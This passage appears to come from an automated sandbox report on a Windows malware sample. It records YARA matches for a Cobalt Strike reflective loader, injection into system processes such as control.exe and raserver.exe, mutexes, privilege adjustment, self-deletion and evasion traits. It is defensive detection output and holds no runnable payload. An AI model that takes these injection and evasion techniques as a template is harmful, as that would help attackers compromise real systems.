                      Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: classification engineClassification label: mal100.evad.winEXE@13/1@1/1
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E53411CB GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,wsprintfW,lstrlenW,OpenProcess,CloseHandle,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,OpenProcess,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,OpenProcess,CloseHandle,wsprintfW,wsprintfW,OpenProcess,OpenProcess,CloseHandle,wsprintfW,wsprintfW,PathFindFileNameW,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,wsprintfW,0_2_00007FF6E53411CB
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180003D40 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,1_2_0000000180003D40
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,3_2_1001C2A5
                      Source: C:\Windows\SysWOW64\fontview.exeCode function: 6_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,6_2_1001C2A5
                      Source: C:\Windows\SysWOW64\resmon.exeCode function: 8_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,8_2_1001C2A5
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeCode function: 9_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,9_2_1001C2A5
                      Source: C:\Windows\SysWOW64\raserver.exeCode function: 10_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,10_2_1001C2A5
                      Source: C:\Users\user\Desktop\1731043030539.exeCode function: 0_2_00007FF6E5341CE0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF6E5341CE0
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180002D50 FindResourceExA,LoadResource,LockResource,SizeofResource,VirtualAlloc,1_2_0000000180002D50
                      Source: C:\Windows\SysWOW64\raserver.exeMutant created: \Sessions\1\BaseNamedObjects\bbbd5638c623ee45d1ee4383bacc9ed0
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeMutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdZBYhEwDqEp
                      Source: C:\Windows\SysWOW64\control.exeMutant created: \Sessions\1\BaseNamedObjects\a5f174079a38c6daa9bd512a0b3dd3e7
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeMutant created: \Sessions\1\BaseNamedObjects\1Xti92xm7E
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\5b32ca781b2a21c0b0fe4d086add70ca
                      Source: C:\Windows\SysWOW64\raserver.exeMutant created: \Sessions\1\BaseNamedObjects\Kc143hk1yh
                      Source: C:\Windows\SysWOW64\resmon.exeMutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdjORyUBzgr
                      Source: C:\Windows\SysWOW64\raserver.exeMutant created: \Sessions\1\BaseNamedObjects\Global\bbbd5638c623ee45d1ee4383bacc9ed0
                      Source: C:\Windows\SysWOW64\control.exeMutant created: \Sessions\1\BaseNamedObjects\4a15df8f8d25cd9eba3e2f86695e0e01
                      Source: C:\Windows\SysWOW64\fontview.exeMutant created: \Sessions\1\BaseNamedObjects\3bjCXr518T
                      Source: C:\Windows\SysWOW64\fontview.exeMutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdQALoBA
                      Source: C:\Users\user\Desktop\1731043030539.exeMutant created: \Sessions\1\BaseNamedObjects\9E4DF875-E953-E4A0-C5A4-989566D33EC8
                      Source: C:\Windows\SysWOW64\raserver.exeMutant created: \Sessions\1\BaseNamedObjects\3afd58813a8c841692dabe2f6ea36d7d
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeMutant created: \Sessions\1\BaseNamedObjects\81eabae79ab132e78d7ad2d9d2894f90
                      Source: C:\Windows\SysWOW64\control.exeMutant created: \Sessions\1\BaseNamedObjects\89c093d255b643bbbe95a3554f1c7508
                      Source: C:\Windows\SysWOW64\resmon.exeMutant created: \Sessions\1\BaseNamedObjects\Y9fG7D0WAW
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\5b32ca781b2a21c0b0fe4d086add70ca
                      Source: C:\Windows\SysWOW64\control.exeMutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdjQBi
                      Source: C:\Windows\SysWOW64\raserver.exeMutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdshWsX
                      Source: C:\Windows\SysWOW64\control.exeMutant created: \Sessions\1\BaseNamedObjects\OTTuH8jClJ
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\81eabae79ab132e78d7ad2d9d2894f90
                      Source: C:\Users\user\Desktop\1731043030539.exeFile created: C:\Users\user\AppData\Local\Temp\9E4DF875-E953-E4A0-C5A4-989566D33EC8.tmpJump to behavior
                      Source: 1731043030539.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 1731043030539.exeVirustotal: Detection: 61%
                      Source: 1731043030539.exeReversingLabs: Detection: 65%
                      Source: unknownProcess created: C:\Users\user\Desktop\1731043030539.exe "C:\Users\user\Desktop\1731043030539.exe"
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\resmon.exe C:\Windows\SysWOW64\resmon.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\BackgroundTransferHost.exe C:\Windows\SysWOW64\BackgroundTransferHost.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetwork -pJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\resmon.exe C:\Windows\SysWOW64\resmon.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\BackgroundTransferHost.exe C:\Windows\SysWOW64\BackgroundTransferHost.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\control.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontview.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\resmon.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\BackgroundTransferHost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\raserver.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                      Source: 1731043030539.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: 1731043030539.exeStatic file information: File size 1088000 > 1048576
                      Source: 1731043030539.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x107000
                      Source: 1731043030539.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: F:\8QProject\process_x64\x64\Release\process_x64_dll.pdb source: 1731043030539.exe

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 1731043030539.exe, type: SAMPLE
                      Source: Yara matchFile source: 8.3.resmon.exe.23007f8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.svchost.exe.1ad89460818.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b7f0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b720000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b650000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.180000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.svchost.exe.1ad89460818.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.control.exe.b107f8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.raserver.exe.2ac07f8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b170000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.resmon.exe.23007f8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.BackgroundTransferHost.exe.6b07f8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.BackgroundTransferHost.exe.10000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.fontview.exe.8207f8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.control.exe.10000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.fontview.exe.10000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1800280b0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.raserver.exe.10000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.svchost.exe.1ad894834c8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.resmon.exe.10000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svchost.exe.1ad8b580000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3294823523.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.2618083519.0000000002300000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2883861414.00000000006B0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.3172524363.0000000002AC0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3295072698.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3294959038.0000000010273000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2033463108.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1731043030539.exe PID: 576, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2360, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontview.exe PID: 5772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: resmon.exe PID: 3376, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BackgroundTransferHost.exe PID: 6404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: raserver.exe PID: 5568, type: MEMORYSTR
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_0000000180011C28 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0000000180011C28
                      Source: 1731043030539.exeStatic PE information: section name: .sign
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD89472B6F push ebp; iretd 1_3_000001AD89472B70
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD89472B8F push ebp; iretd 1_3_000001AD89472B90
                      Source: C:\Windows\System32\svchost.exeCode function: 1_3_000001AD89472BB8 push ebp; iretd 1_3_000001AD89472BB9
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B10EA4 push edi; ret 3_3_00BA8F07
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B118A4 push edi; ret 3_3_00B8CEF4
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B118AF push edi; ret 3_3_00B118BF
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B11692 push edi; ret 3_3_00BA7BEF
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B1189A push edi; ret 3_3_00B118A3
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B71CF1 push FFFFFFDDh; retf 3_3_00B71D7B
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B746D1 push edi; ret 3_3_00B746DD
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B118C0 push edi; ret 3_3_00B118C1
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B116CF push edi; ret 3_3_00B116DF
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B73E3D push edi; ret 3_3_00BB2619
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B73A75 push edi; ret 3_3_00B73A8E
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B11A75 pushad ; iretd 3_3_00B11A97
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B11675 push edi; ret 3_3_00B11677
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B10C7F push edi; ret 3_3_00B83E8A
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B72068 push edi; ret 3_3_00B72069
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B7225E push edi; ret 3_3_00B7225F
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B72046 push edi; ret 3_3_00B72056
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B72240 push dword ptr [ebx]; ret 3_3_00B72245
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B745A8 push edi; ret 3_3_00B82517
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B72582 push edi; ret 3_3_00B9BFD4
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B739C2 push edi; ret 3_3_00B739C5
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B739C8 push edi; ret 3_3_00B739C5
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B739C8 push dword ptr [ebx]; ret 3_3_00B739CD
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B71D27 push FFFFFFDDh; retf 3_3_00B71D7B
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B11306 push edi; ret 3_3_00B8C97D
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B72178 push edi; ret 3_3_00B87878
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B72578 push edi; ret 3_3_00BAB92B
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_3_00B7456A push edi; ret 3_3_00BA09D8

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\1731043030539.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeCode function: 1_2_000000018000B790 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_000000018000B790
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1731043030539.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_100061463_2_10006146
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_100063763_2_10006376
                      Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_1000E9713_2_1000E971
